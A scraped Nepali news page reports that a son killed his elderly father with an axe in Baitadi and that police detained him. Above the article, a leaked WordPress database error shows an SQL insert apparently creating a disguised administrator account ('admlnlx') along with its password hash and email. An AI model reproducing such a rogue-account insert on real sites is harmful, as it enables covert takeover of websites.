WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSlnYVC6EbNTFj1SzExyA6LFXHMh630', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:43:20', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । बैतडीमा बञ्चरो प्रहार गरी आज बिहान छोराले बुबाको हत्या गरेका छन् । डिलाशैनी गाउँपालिका–५ शेराका ६८ वर्षीय अन्तराम जोशीको हत्या भएको हो ।
जोशीका छोरा २२ वर्षीय लोकराजले बिहान ६ बजे बञ्चरो प्रहार गरी हत्या गरेका हुन् । बिहान घरमै ठेकी सफा गरिरहेका अन्तरामलाई लोकराजले बञ्चरो प्रहार गरेको डिलाशैनी गाउँपालिका–५ का वडाध्यक्ष तथा गाउँपालिकाका प्रवक्ता यज्ञराज भट्टले जानकारी दिनुभयो । उहाँले भन्नुभयो, “मानसिक अवस्था ठिक नभएका लोकराजले बञ्चरो प्रहार गरेका हुन् । टाउकोमै चोट लागेका अन्तरामको घटनास्थलमै मृत्यु भएको छ ।”
बञ्चरो प्रहार गर्ने लोकराजलाई नियन्त्रणमा लिइएको बैतडीका प्रहरी प्रवक्ता, प्रहरी निरीक्षक लोकराज जोशीले जानकारी दिनुभयो । अनुसन्धान गर्न इलाका प्रहरी कार्यालय पाटनबाट प्रहरी निरीक्षक कमल चौधरी नेतृत्वको टोली घटनास्थल पुगेको छ । रासस